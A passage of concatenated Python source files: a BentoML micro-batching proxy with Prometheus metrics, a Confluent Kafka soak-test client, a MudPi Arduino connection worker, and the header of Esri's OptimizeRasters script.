from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.server.trace import async_trace, make_http_headers
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
ZIPKIN_API_URL = config("tracing").get("zipkin_api_url")
def metrics_patch(cls):
    """Class decorator that adds Prometheus instrumentation to a marshal service.

    Wraps ``request_dispatcher`` and ``_batch_handler_template`` so that
    per-endpoint request totals, durations, in-progress gauges, exception
    counts and micro-batch sizes are recorded.
    """
    class _MarshalService(cls):
        def __init__(self, *args, **kwargs):
            # Imported lazily so prometheus_client is only required when the
            # metrics-patched class is actually instantiated.
            from prometheus_client import Histogram, Counter, Gauge
            super(_MarshalService, self).__init__(*args, **kwargs)
            namespace = config('instrument').get(
                'default_namespace'
            )  # its own namespace?
            service_name = self.bento_service_metadata_pb.name
            self.metrics_request_batch_size = Histogram(
                # Fixed missing space: was "<name>microbatch request batch size".
                name=service_name + '_mb_batch_size',
                documentation=service_name + " microbatch request batch size",
                namespace=namespace,
                labelnames=['endpoint'],
            )
            self.metrics_request_duration = Histogram(
                name=service_name + '_mb_requestmb_duration_seconds',
                documentation=service_name + " API HTTP request duration in seconds",
                namespace=namespace,
                labelnames=['endpoint', 'http_response_code'],
            )
            self.metrics_request_in_progress = Gauge(
                name=service_name + "_mb_request_in_progress",
                documentation='Total number of HTTP requests in progress now',
                namespace=namespace,
                labelnames=['endpoint', 'http_method'],
            )
            self.metrics_request_exception = Counter(
                name=service_name + "_mb_request_exception",
                documentation='Total number of service exceptions',
                namespace=namespace,
                labelnames=['endpoint', 'exception_class'],
            )
            self.metrics_request_total = Counter(
                name=service_name + "_mb_request_total",
                # Fixed copy-paste: this counter tracks total requests, not
                # exceptions (the original duplicated the exception text).
                documentation='Total number of HTTP requests',
                namespace=namespace,
                labelnames=['endpoint', 'http_response_code'],
            )

        async def request_dispatcher(self, request):
            """Dispatch *request* through the parent class while recording metrics."""
            func = super(_MarshalService, self).request_dispatcher
            api_name = request.match_info.get("name", "/")
            _metrics_request_in_progress = self.metrics_request_in_progress.labels(
                endpoint=api_name, http_method=request.method,
            )
            _metrics_request_in_progress.inc()
            time_st = time.time()
            try:
                resp = await func(request)
            except Exception as e:  # pylint: disable=broad-except
                # Count the exception class and synthesize a 500 so the
                # total/duration metrics below still observe a status code.
                self.metrics_request_exception.labels(
                    endpoint=api_name, exception_class=e.__class__.__name__
                ).inc()
                logger.error(traceback.format_exc())
                resp = aiohttp.web.Response(status=500)
            self.metrics_request_total.labels(
                endpoint=api_name, http_response_code=resp.status
            ).inc()
            self.metrics_request_duration.labels(
                endpoint=api_name, http_response_code=resp.status
            ).observe(time.time() - time_st)
            _metrics_request_in_progress.dec()
            return resp

        async def _batch_handler_template(self, requests, api_name):
            """Record the micro-batch size, then delegate to the real handler."""
            func = super(_MarshalService, self)._batch_handler_template
            self.metrics_request_batch_size.labels(endpoint=api_name).observe(
                len(requests)
            )
            return await func(requests, api_name)

    return _MarshalService
@metrics_patch
class MarshalService:
    """
    MarshalService creates a reverse proxy server in front of the actual API
    server, implementing the micro batching feature.
    It waits a short period and packs multiple requests in a single batch
    before sending them to the API server.
    It applies an optimized CORK algorithm to get best efficiency.
    """

    _MARSHAL_FLAG = config("marshal_server").get("marshal_request_header_flag")
    _DEFAULT_PORT = config("apiserver").getint("default_port")
    DEFAULT_MAX_LATENCY = config("marshal_server").getint("default_max_latency")
    DEFAULT_MAX_BATCH_SIZE = config("marshal_server").getint("default_max_batch_size")

    def __init__(
        self,
        bento_bundle_path,
        outbound_host="localhost",
        outbound_port=None,
        outbound_workers=1,
    ):
        """Load bundle metadata and register batch handlers for its APIs.

        :param bento_bundle_path: path to the saved BentoService bundle
        :param outbound_host: host of the proxied API server
        :param outbound_port: port of the proxied API server (may be set later)
        :param outbound_workers: max concurrent outbound connections
        """
        self.outbound_host = outbound_host
        self.outbound_port = outbound_port
        self.outbound_workers = outbound_workers
        self.batch_handlers = dict()
        self._outbound_sema = None  # the semaphore to limit outbound connections
        self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
        self.setup_routes_from_pb(self.bento_service_metadata_pb)
        if psutil.POSIX:
            import resource
            self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
        else:
            self.CONNECTION_LIMIT = 1024
        logger.info(
            "Your system nofile limit is %d, which means each instance of microbatch "
            "service is able to hold this number of connections at same time. "
            "You can increase the number of file descriptors for the server process, "
            "or launch more microbatch instances to accept more concurrent connection.",
            self.CONNECTION_LIMIT,
        )

    def set_outbound_port(self, outbound_port):
        """Set the port of the proxied API server after construction."""
        self.outbound_port = outbound_port

    def fetch_sema(self):
        """Lazily create and return the shared outbound-connection semaphore."""
        if self._outbound_sema is None:
            self._outbound_sema = NonBlockSema(self.outbound_workers)
        return self._outbound_sema

    def add_batch_handler(self, api_name, max_latency, max_batch_size):
        '''
        Register a CorkDispatcher-wrapped batch handler for *api_name*.

        Params:
        * max_latency: limit the max latency of overall request handling
        * max_batch_size: limit the max batch size for handler
        ** marshal server will give priority to meet these limits than efficiency
        '''
        if api_name not in self.batch_handlers:
            _func = CorkDispatcher(
                max_latency,
                max_batch_size,
                shared_sema=self.fetch_sema(),
                fallback=aiohttp.web.HTTPTooManyRequests,
            )(partial(self._batch_handler_template, api_name=api_name))
            self.batch_handlers[api_name] = _func

    def setup_routes_from_pb(self, bento_service_metadata_pb):
        """Enable micro batching for every API whose input type supports it."""
        from bentoml.adapters import BATCH_MODE_SUPPORTED_INPUT_TYPES
        for api_pb in bento_service_metadata_pb.apis:
            if api_pb.input_type in BATCH_MODE_SUPPORTED_INPUT_TYPES:
                max_latency = api_pb.mb_max_latency or self.DEFAULT_MAX_LATENCY
                max_batch_size = api_pb.mb_max_batch_size or self.DEFAULT_MAX_BATCH_SIZE
                self.add_batch_handler(api_pb.name, max_latency, max_batch_size)
                logger.info("Micro batch enabled for API `%s`", api_pb.name)

    async def request_dispatcher(self, request):
        """Route *request* to its registered batch handler, or relay it as-is."""
        with async_trace(
            ZIPKIN_API_URL,
            service_name=self.__class__.__name__,
            span_name="[1]http request",
            is_root=True,
            standalone=True,
            sample_rate=0.001,
        ):
            api_name = request.match_info.get("name")
            if api_name in self.batch_handlers:
                req = HTTPRequest(
                    tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
                    await request.read(),
                )
                try:
                    resp = await self.batch_handlers[api_name](req)
                except RemoteException as e:
                    # known remote exception: propagate the model server's response
                    logger.error(traceback.format_exc())
                    resp = aiohttp.web.Response(
                        status=e.payload.status,
                        headers=e.payload.headers,
                        body=e.payload.body,
                    )
                except Exception:  # pylint: disable=broad-except
                    logger.error(traceback.format_exc())
                    resp = aiohttp.web.HTTPInternalServerError()
            else:
                resp = await self.relay_handler(request)
        return resp

    async def relay_handler(self, request):
        """Forward a non-batched *request* to the API server unchanged,
        adding distributed-tracing headers."""
        data = await request.read()
        headers = dict(request.headers)
        url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
        with async_trace(
            ZIPKIN_API_URL,
            service_name=self.__class__.__name__,
            span_name=f"[2]{url.path} relay",
        ) as trace_ctx:
            headers.update(make_http_headers(trace_ctx))
            async with aiohttp.ClientSession() as client:
                # Fixed: forward the merged `headers` dict. The original passed
                # `request.headers`, silently dropping the trace headers that
                # were merged in just above.
                async with client.request(
                    request.method, url, data=data, headers=headers
                ) as resp:
                    body = await resp.read()
        return aiohttp.web.Response(
            status=resp.status, body=body, headers=resp.headers,
        )

    async def _batch_handler_template(self, requests, api_name):
        '''
        batch request handler
        params:
        * requests: list of aiohttp request
        * api_name: called API name
        raise:
        * RemoteException: known exceptions from model server
        * Exception: other exceptions
        '''
        headers = {self._MARSHAL_FLAG: "true"}
        api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_name}"
        with async_trace(
            ZIPKIN_API_URL,
            service_name=self.__class__.__name__,
            span_name=f"[2]merged {api_name}",
        ) as trace_ctx:
            headers.update(make_http_headers(trace_ctx))
            reqs_s = DataLoader.merge_requests(requests)
            try:
                async with aiohttp.ClientSession() as client:
                    async with client.post(
                        api_url, data=reqs_s, headers=headers
                    ) as resp:
                        raw = await resp.read()
            except aiohttp.client_exceptions.ClientConnectionError as e:
                raise RemoteException(
                    e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
                )
            if resp.status != 200:
                raise RemoteException(
                    f"Bad response status from model server:\n{resp.status}\n{raw}",
                    payload=HTTPResponse(
                        status=resp.status,
                        headers=tuple(resp.headers.items()),
                        body=raw,
                    ),
                )
            merged = DataLoader.split_responses(raw)
            return tuple(
                aiohttp.web.Response(body=i.body, headers=i.headers, status=i.status)
                for i in merged
            )

    def async_start(self, port):
        """
        Start a micro batch server at the given port in a daemon subprocess.
        """
        marshal_proc = multiprocessing.Process(
            target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
        )
        marshal_proc.start()
        logger.info("Running micro batch service on :%d", port)

    def make_app(self):
        """Build the aiohttp Application with relay and dispatch routes."""
        app = aiohttp.web.Application()
        app.router.add_view("/", self.relay_handler)
        app.router.add_view("/{name}", self.request_dispatcher)
        app.router.add_view("/{path:.*}", self.relay_handler)
        return app

    def fork_start_app(self, port):
        """Run the aiohttp app in the forked process (blocking)."""
        # Use new eventloop in the fork process to avoid problems on MacOS
        # ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        app = self.make_app()
        aiohttp.web.run_app(app, port=port)
|
soakclient.py | #!/usr/bin/env python
#
# Copyright 2018 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Soak test producer-consumer end-to-end client for
# long term validation testing.
#
# Usage:
# tests/soak/soakclient.py -t soaktest.py -r 80 -f <client-conf-file>
#
from confluent_kafka import KafkaError, KafkaException, version
from confluent_kafka import Producer, Consumer
from confluent_kafka.admin import AdminClient, NewTopic
from collections import defaultdict
from builtins import int
import argparse
import threading
import time
import json
import logging
import sys
class SoakRecord (object):
    """A private record type, with JSON serializer and deserializer."""

    def __init__(self, msgid, name=None):
        # Default the display name to one derived from the message id.
        self.msgid = msgid
        self.name = "SoakRecord nr #{}".format(msgid) if name is None else name

    def serialize(self):
        """Return this record encoded as a JSON object string."""
        return json.dumps(self, default=lambda o: o.__dict__)

    def __str__(self):
        return "SoakRecord({})".format(self.name)

    @classmethod
    def deserialize(cls, binstr):
        """Rebuild a SoakRecord from the JSON produced by serialize()."""
        parsed = json.loads(binstr)
        return cls(parsed['msgid'], parsed['name'])
class SoakClient (object):
    """ The SoakClient consists of a Producer sending messages at
    the given rate, and a Consumer consuming the messages.
    Both clients print their message and error counters every 10 seconds.
    """

    def dr_cb(self, err, msg):
        """ Producer delivery report callback """
        if err is not None:
            self.logger.warning("producer: delivery failed: {} [{}]: {}".format(msg.topic(), msg.partition(), err))
            self.dr_err_cnt += 1
        else:
            self.dr_cnt += 1
            # Only log every disprate-th delivery to keep output manageable.
            if (self.dr_cnt % self.disprate) == 0:
                self.logger.debug("producer: delivered message to {} [{}] at offset {}".format(
                    msg.topic(), msg.partition(), msg.offset()))

    def produce_record(self):
        """ Produce a single record, retrying while the local queue is full """
        record = SoakRecord(self.producer_msgid)
        txcnt = 0
        while True:
            txcnt += 1
            try:
                self.producer.produce(self.topic, value=record.serialize(),
                                      headers={"msgid": str(record.msgid),
                                               "time": str(time.time()),
                                               "txcnt": str(txcnt)},
                                      on_delivery=self.dr_cb)
                break
            except BufferError:
                # Local producer queue is full: serve delivery callbacks for
                # up to 1s to drain it, then retry the produce().
                self.producer.poll(1)
                continue
        self.producer_msgid += 1

    def producer_stats(self):
        """ Print producer stats """
        self.logger.info("producer: {} messages produced, {} delivered, {} failed, {} error_cbs".format(
            self.producer_msgid, self.dr_cnt, self.dr_err_cnt,
            self.producer_error_cb_cnt))

    def producer_run(self):
        """ Producer main loop """
        sleep_intvl = 1.0 / self.rate
        self.producer_msgid = 0
        self.dr_cnt = 0
        self.dr_err_cnt = 0
        self.producer_error_cb_cnt = 0
        next_stats = time.time() + 10
        while self.run:
            self.produce_record()
            now = time.time()
            t_end = now + sleep_intvl
            # Poll for delivery callbacks until the inter-message interval
            # has elapsed, emitting stats every 10 seconds.
            while True:
                if now > next_stats:
                    self.producer_stats()
                    next_stats = now + 10
                remaining_time = t_end - now
                if remaining_time < 0:
                    remaining_time = 0
                self.producer.poll(remaining_time)
                if remaining_time <= 0:
                    break
                now = time.time()
        remaining = self.producer.flush(30)
        self.logger.warning("producer: {} message(s) remaining in queue after flush()".format(remaining))
        self.producer_stats()

    def producer_thread_main(self):
        """ Producer thread main function """
        try:
            self.producer_run()
        except KeyboardInterrupt:
            self.logger.info("producer: aborted by user")
            self.run = False
        except Exception as ex:
            self.logger.fatal("producer: fatal exception: {}".format(ex))
            self.run = False

    def consumer_stats(self):
        """ Print consumer stats """
        self.logger.info("consumer: {} messages consumed, {} duplicates, "
                         "{} missed, {} message errors, {} consumer errors, {} error_cbs".format(
                             self.msg_cnt, self.msg_dup_cnt, self.msg_miss_cnt,
                             self.msg_err_cnt, self.consumer_err_cnt,
                             self.consumer_error_cb_cnt))

    def consumer_run(self):
        """ Consumer main loop """
        self.consumer_msgid_next = 0
        self.consumer.subscribe([self.topic])
        self.msg_cnt = 0
        self.msg_dup_cnt = 0
        self.msg_miss_cnt = 0
        self.msg_err_cnt = 0
        self.consumer_err_cnt = 0
        self.consumer_error_cb_cnt = 0
        # Fixed typo: was "last_commited", but the dup/lost warning paths and
        # the commit callback read/write self.last_committed, which would
        # raise AttributeError before the first commit callback fired.
        self.last_committed = None
        # Keep track of high-watermarks to make sure we don't go backwards
        hwmarks = defaultdict(int)
        while self.run:
            msg = self.consumer.poll(1)
            if msg is None:
                continue
            if msg.error() is not None:
                self.logger.error("consumer: error: {}".format(msg.error()))
                self.consumer_err_cnt += 1
                continue
            try:
                record = SoakRecord.deserialize(msg.value())  # noqa unused variable
            except ValueError as ex:
                self.logger.info("consumer: Failed to deserialize message in "
                                 "{} [{}] at offset {} (headers {}): {}".format(
                                     msg.topic(), msg.partition(), msg.offset(), msg.headers(), ex))
                self.msg_err_cnt += 1
            self.msg_cnt += 1
            if (self.msg_cnt % self.disprate) == 0:
                self.logger.info("consumer: {} messages consumed: Message {} "
                                 "[{}] at offset {} (headers {}, latency {})".format(
                                     self.msg_cnt,
                                     msg.topic(), msg.partition(),
                                     msg.offset(), msg.headers(),
                                     time.time() - float(dict(msg.headers())['time'])))
                self.consumer_stats()
            # Compare against the per-partition high watermark to detect
            # duplicate/old messages and gaps (lost messages).
            hwkey = "{}-{}".format(msg.topic(), msg.partition())
            hw = hwmarks[hwkey]
            if hw > 0:
                if msg.offset() <= hw:
                    self.logger.warning("consumer: Old or duplicate message {} "
                                        "[{}] at offset {} (headers {}): wanted offset > {} (last commited {})".format(
                                            msg.topic(), msg.partition(),
                                            msg.offset(), msg.headers(), hw,
                                            self.last_committed))
                    self.msg_dup_cnt += (hw + 1) - msg.offset()
                elif msg.offset() > hw + 1:
                    self.logger.warning("consumer: Lost messages, now at {} "
                                        "[{}] at offset {} (headers {}): "
                                        "expected offset {}+1 (last committed {})".format(
                                            msg.topic(), msg.partition(),
                                            msg.offset(), msg.headers(), hw,
                                            self.last_committed))
                    self.msg_miss_cnt += msg.offset() - (hw + 1)
            hwmarks[hwkey] = msg.offset()
        self.consumer.close()
        self.consumer_stats()

    def consumer_thread_main(self):
        """ Consumer thread main function """
        try:
            self.consumer_run()
        except KeyboardInterrupt:
            self.logger.info("consumer: aborted by user")
            self.run = False
        except Exception as ex:
            self.logger.fatal("consumer: fatal exception: {}".format(ex))
            self.run = False

    def consumer_error_cb(self, err):
        """ Consumer error callback """
        self.logger.error("consumer: error_cb: {}".format(err))
        self.consumer_error_cb_cnt += 1

    def consumer_commit_cb(self, err, partitions):
        """ Auto commit result callback """
        if err is not None:
            self.logger.error("consumer: offset commit failed for {}: {}".format(partitions, err))
            self.consumer_err_cnt += 1
        else:
            self.last_committed = partitions

    def producer_error_cb(self, err):
        """ Producer error callback """
        self.logger.error("producer: error_cb: {}".format(err))
        self.producer_error_cb_cnt += 1

    def stats_cb(self, json_str):
        """ Common statistics callback.
        Extracts the number of connected brokers and prints it,
        to monitor the sparse connection functionality. """
        d = json.loads(json_str)
        brokers = d['brokers']
        broker_cnt = len(brokers)
        up_brokers = [brokers[x]['name'] for x in brokers if brokers[x]['state'] == 'UP']
        if self.topic in d['topics']:
            leaders = ['{}={}'.format(p['partition'], p['leader'])
                       for p in d['topics'][self.topic]['partitions'].values() if p['partition'] != -1]
        else:
            leaders = []
        self.logger.info("{} stats: {}/{} brokers UP, {} partition leaders: {}".format(
            d['name'], len(up_brokers), broker_cnt, self.topic, leaders))
        # Dump the full raw stats blob every 10th callback per client type.
        self.stats_cnt[d['type']] += 1
        if (self.stats_cnt[d['type']] % 10) == 0:
            self.logger.info("{} raw stats: {}".format(d['name'], json_str))

    def create_topic(self, topic, conf):
        """ Create the topic if it doesn't already exist """
        admin = AdminClient(conf)
        fs = admin.create_topics([NewTopic(topic, num_partitions=2, replication_factor=3)])
        f = fs[topic]
        try:
            res = f.result()  # noqa unused variable
        except KafkaException as ex:
            if ex.args[0].code() == KafkaError.TOPIC_ALREADY_EXISTS:
                self.logger.info("Topic {} already exists: good".format(topic))
            else:
                raise

    def __init__(self, topic, rate, conf):
        """ SoakClient constructor. conf is the client configuration """
        self.topic = topic
        self.rate = rate
        self.disprate = int(rate * 10)
        self.run = True
        self.stats_cnt = {'producer': 0, 'consumer': 0}
        self.start_time = time.time()
        self.logger = logging.getLogger('soakclient')
        self.logger.setLevel(logging.DEBUG)
        handler = logging.StreamHandler()
        handler.setFormatter(logging.Formatter('%(asctime)-15s %(levelname)-8s %(message)s'))
        self.logger.addHandler(handler)
        # Create topic (might already exist)
        self.create_topic(self.topic, conf)
        #
        # Create Producer and Consumer, each running in its own thread.
        #
        conf['stats_cb'] = self.stats_cb
        conf['statistics.interval.ms'] = 10000
        # Producer
        conf['error_cb'] = self.producer_error_cb
        self.producer = Producer(conf)
        # Consumer (note: the shared conf dict's error_cb is overwritten here)
        conf['error_cb'] = self.consumer_error_cb
        conf['on_commit'] = self.consumer_commit_cb
        self.logger.info("consumer: using group.id {}".format(conf['group.id']))
        self.consumer = Consumer(conf)
        self.producer_thread = threading.Thread(target=self.producer_thread_main)
        self.producer_thread.start()
        self.consumer_thread = threading.Thread(target=self.consumer_thread_main)
        self.consumer_thread.start()

    def terminate(self):
        """ Terminate Producer and Consumer """
        # Fixed: use self.logger; the original referenced the module-level
        # "soak" global, coupling this method to the script's entry point.
        self.logger.info("Terminating (ran for {}s)".format(time.time() - self.start_time))
        self.run = False
        self.producer_thread.join()
        self.consumer_thread.join()
if __name__ == '__main__':
    # Command-line entry point: parse arguments, build the client
    # configuration, and run the soak client until interrupted.
    parser = argparse.ArgumentParser(description='Kafka client soak test')
    parser.add_argument('-b', dest='brokers', type=str, default=None, help='Bootstrap servers')
    parser.add_argument('-t', dest='topic', type=str, required=True, help='Topic to use')
    parser.add_argument('-r', dest='rate', type=float, default=10, help='Message produce rate per second')
    parser.add_argument('-f', dest='conffile', type=argparse.FileType('r'),
                        help='Configuration file (configprop=value format)')
    args = parser.parse_args()
    conf = dict()
    if args.conffile is not None:
        # Parse client configuration file
        for line in args.conffile:
            line = line.strip()
            # Skip blank lines and '#' comments.
            if len(line) == 0 or line[0] == '#':
                continue
            i = line.find('=')
            if i <= 0:
                raise ValueError("Configuration lines must be `name=value..`, not {}".format(line))
            name = line[:i]
            value = line[i+1:]
            conf[name] = value
    if args.brokers is not None:
        # Overwrite any brokers specified in configuration file with
        # brokers from -b command line argument
        conf['bootstrap.servers'] = args.brokers
    if 'group.id' not in conf:
        # Generate a group.id bound to this client and python version
        conf['group.id'] = 'soakclient.py-{}-{}'.format(version()[0], sys.version.split(' ')[0])
    # We don't care about partition EOFs
    conf['enable.partition.eof'] = False
    # Create SoakClient
    soak = SoakClient(args.topic, args.rate, conf)
    # Run until interrupted
    try:
        # The main thread idles; producer/consumer threads do the work.
        while soak.run:
            time.sleep(10)
        soak.logger.info("Soak client aborted")
    except (KeyboardInterrupt):
        soak.logger.info("Interrupted by user")
    except Exception as e:
        soak.logger.error("Fatal exception {}".format(e))
    # Terminate
    soak.terminate()
|
arduino_worker.py | import time
import json
import threading
import random
import socket
from nanpy import (SerialManager, ArduinoApi)
from nanpy.serialmanager import SerialManagerError
from nanpy.sockconnection import (SocketManager, SocketManagerError)
from workers.arduino.arduino_control_worker import ArduinoControlWorker
from workers.arduino.arduino_sensor_worker import ArduinoSensorWorker
from workers.arduino.arduino_relay_worker import ArduinoRelayWorker
from .worker import Worker
import sys
import importlib
from logger.Logger import Logger, LOG_LEVEL
# r = redis.Redis(host='127.0.0.1', port=6379)
class ArduinoWorker(Worker):
    """Supervises a single Arduino node: owns its (wifi-socket or serial)
    connection and spawns control/relay/sensor sub-workers that share it,
    reconnecting with randomized backoff when the connection drops."""

    def __init__(self, config, main_thread_running, system_ready,
                 connection=None):
        super().__init__(config, main_thread_running, system_ready)
        self.connection = connection
        self.threads = []
        # Events
        self.node_ready = threading.Event()
        self.node_connected = threading.Event()  # Event to signal if node can be used
        self.workers = []
        self.relays = []
        self.relayEvents = {}
        self.relay_index = 0
        if connection is None:
            self.connection = self.connect()
        # A missing 'controls'/'relays'/'sensors' key raises KeyError, which
        # each try/except below treats as "feature disabled".
        try:
            if self.config['controls'] is not None:
                acw = ArduinoControlWorker(self.config, main_thread_running,
                                           system_ready, self.node_connected,
                                           self.connection)
                self.workers.append(acw)
                time.sleep(3)
        except KeyError:
            Logger.log(LOG_LEVEL["info"],
                       '{name} Node Controls...\t\t\033[1;31m Disabled\033[0;0m'.format(
                           **self.config))
        try:
            if self.config['relays'] is not None:
                for relay in self.config['relays']:
                    # Create a threading event for each relay to check status
                    relayState = {
                        "available": threading.Event(),
                        # Event to allow relay to activate
                        "active": threading.Event()
                        # Event to signal relay to open/close
                    }
                    # Store the relays under the key or index if no key is found, this way we can reference the right relays
                    self.relayEvents[
                        relay.get("key", self.relay_index)] = relayState
                    # Create sensor worker for a relay
                    # NOTE(review): self.api is only assigned in connect()'s
                    # wifi branch — confirm it exists here for serial nodes
                    # (and when a connection was passed in to __init__).
                    arw = ArduinoRelayWorker(relay, main_thread_running,
                                             system_ready,
                                             relayState['available'],
                                             relayState['active'],
                                             self.node_connected,
                                             self.connection, self.api)
                    # Make the relays available, this event is toggled off elsewhere if we need to disable relays
                    relayState['available'].set()
                    self.relay_index += 1
                    self.workers.append(arw)
                    time.sleep(3)
        except KeyError:
            Logger.log(LOG_LEVEL["info"],
                       '{name} Node Relays...\t\t\033[1;31m Disabled\033[0;0m'.format(
                           **self.config))
        try:
            if self.config['sensors'] is not None:
                asw = ArduinoSensorWorker(self.config, main_thread_running,
                                          system_ready, self.node_connected,
                                          self.connection, self.api)
                self.workers.append(asw)
                time.sleep(3)
        except KeyError:
            Logger.log(LOG_LEVEL["info"],
                       '{name} Node Sensors...\t\t\033[1;31m Disabled\033[0;0m'.format(
                           **self.config))
        return

    def connect(self):
        """Try up to 3 times to open a wifi (SocketManager) or serial
        (SerialManager) connection, sharing it with all sub-workers and
        setting node_connected/node_ready on success.

        Returns the connection object, or None if all attempts failed.
        """
        attempts = 3
        conn = None
        if self.config.get('use_wifi', False):
            while attempts > 0 and self.main_thread_running.is_set():
                try:
                    # NOTE(review): the format string only uses {0}; the
                    # second argument (3 - attempts) is ignored by str.format.
                    Logger.log(LOG_LEVEL["debug"],
                               '\033[1;36m{0}\033[0;0m -> Connecting... \t'.format(
                                   self.config["name"], (3 - attempts)))
                    attempts -= 1
                    conn = SocketManager(
                        host=str(self.config.get('address', 'mudpi.local')))
                    # Test the connection with api
                    self.api = ArduinoApi(connection=conn)
                except (
                        SocketManagerError, BrokenPipeError, ConnectionResetError,
                        socket.timeout) as e:
                    Logger.log(LOG_LEVEL["warning"],
                               '{name} -> Connecting...\t\t\033[1;33m Timeout\033[0;0m '.format(
                                   **self.config))
                    if attempts > 0:
                        Logger.log(LOG_LEVEL["info"],
                                   '{name} -> Preparing Reconnect... \t'.format(
                                       **self.config))
                    else:
                        Logger.log(LOG_LEVEL["error"],
                                   '{name} -> Connection Attempts...\t\033[1;31m Failed\033[0;0m '.format(
                                       **self.config))
                    conn = None
                    self.resetConnection()
                    time.sleep(15)
                except (OSError, KeyError) as e:
                    Logger.log(LOG_LEVEL["error"],
                               '[{name}] \033[1;33m Node Not Found. (Is it online?)\033[0;0m'.format(
                                   **self.config))
                    conn = None
                    self.resetConnection()
                    time.sleep(15)
                else:
                    # try/else: connection + api test succeeded.
                    Logger.log(LOG_LEVEL["info"],
                               '{name} -> Wifi Connection \t\t\033[1;32m Success\033[0;0m '.format(
                                   **self.config))
                    for worker in self.workers:
                        worker.connection = conn
                    self.node_connected.set()
                    self.node_ready.set()
                    break
        else:
            while attempts > 0 and self.main_thread_running.is_set():
                try:
                    attempts -= 1
                    conn = SerialManager(
                        device=str(self.config.get('address', '/dev/ttyUSB1')))
                except SerialManagerError:
                    Logger.log(LOG_LEVEL["warning"],
                               '{name} -> Connecting...\t\t\033[1;33m Timeout\033[0;0m '.format(
                                   **self.config))
                    if attempts > 0:
                        # NOTE(review): end=/flush= look like leftover print()
                        # kwargs — confirm Logger.log accepts them.
                        Logger.log(LOG_LEVEL["info"],
                                   '{name} -> Preparing Reconnect... \t'.format(
                                       **self.config), end='\r', flush=True)
                    else:
                        Logger.log(LOG_LEVEL["error"],
                                   '{name} -> Connection Attempts...\t\033[1;31m Failed\033[0;0m '.format(
                                       **self.config))
                    self.resetConnection()
                    conn = None
                    time.sleep(15)
                else:
                    if conn is not None:
                        Logger.log(LOG_LEVEL["info"],
                                   '[{name}] Serial Connection \t\033[1;32m Success\033[0;0m '.format(
                                       **self.config))
                        for worker in self.workers:
                            worker.connection = conn
                        self.node_connected.set()
                        self.node_ready.set()
                        break
        return conn

    def resetConnection(self):
        """Drop the connection and clear the connected/ready events."""
        self.connection = None
        self.node_connected.clear()
        self.node_ready.clear()

    def run(self):
        """Start all sub-workers, then this worker's own supervision thread.

        Returns the supervision thread.
        """
        for worker in self.workers:
            t = worker.run()
            self.threads.append(t)
            time.sleep(1)
        t = threading.Thread(target=self.work, args=())
        t.start()
        if self.node_ready.is_set():
            Logger.log(LOG_LEVEL["info"], str(
                self.config['name']) + ' Node Worker ' + '[S: ' + str(
                len(self.config.get('sensors', []))) + ']' + '[C: ' + str(len(
                    self.config.get('controls',
                                    []))) + ']...\t\033[1;32m Online\033[0;0m')
        else:
            Logger.log(LOG_LEVEL["info"], str(self.config[
                'name']) + '...\t\t\t\t\033[1;33m Pending Reconnect\033[0;0m ')
        return t

    def work(self):
        """Supervision loop: watch the connection while it is up; when the
        node is not ready, retry connect() with randomized backoff."""
        delay_multiplier = 1
        while self.main_thread_running.is_set():
            if self.system_ready.is_set() and self.node_ready.is_set():
                if not self.node_connected.is_set():
                    # Connection Broken - Reset Connection
                    self.resetConnection()
                    Logger.log(LOG_LEVEL["warning"],
                               '\033[1;36m{name}\033[0;0m -> \033[1;33mTimeout!\033[0;0m \t\t\t\033[1;31m Connection Broken\033[0;0m'.format(
                                   **self.config))
                    time.sleep(30)
            else:
                # Node reconnection cycle
                if not self.node_connected.is_set():
                    # Random delay before connections to offset multiple attempts (1-5 min delay)
                    random_delay = (random.randrange(30, self.config.get(
                        "max_reconnect_delay", 300)) * delay_multiplier) / 2
                    time.sleep(10)
                    Logger.log(LOG_LEVEL["info"], '\033[1;36m' + str(
                        self.config[
                            'name']) + '\033[0;0m -> Retrying in ' + '{0}s...'.format(
                        random_delay) + '\t\033[1;33m Pending Reconnect\033[0;0m ')
                    # Two separate checks for main thread event to prevent re-connections during shutdown
                    if self.main_thread_running.is_set():
                        time.sleep(random_delay)
                    if self.main_thread_running.is_set():
                        self.connection = self.connect()
                        # Back off further after each failed reconnect (capped at 6x).
                        if self.connection is None:
                            delay_multiplier += 1
                            if delay_multiplier > 6:
                                delay_multiplier = 6
                        else:
                            delay_multiplier = 1
            # Main loop delay between cycles
            # NOTE(review): self.sleep_duration presumably comes from the
            # Worker base class — not visible here.
            time.sleep(self.sleep_duration)
        # This is only ran after the main thread is shut down
        # Join all our sub threads for shutdown
        for thread in self.threads:
            thread.join()
        Logger.log(LOG_LEVEL["info"], (
            "{name} Shutting Down...\t\t\033[1;32m Complete\033[0;0m".format(
                **self.config)))
|
OptimizeRasters.py | # ------------------------------------------------------------------------------
# Copyright 2021 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: OptimizeRasters.py
# Description: Optimizes rasters via gdal_translate/gdaladdo
# Version: 20211010
# Requirements: Python
# Required Arguments: -input -output
# Optional Arguments: -mode -cache -config -quality -prec -pyramids
# -tempinput -tempoutput -subs -clouddownload -cloudupload
# -inputprofile -outputprofile -op -job -inputprofile -outputprofile
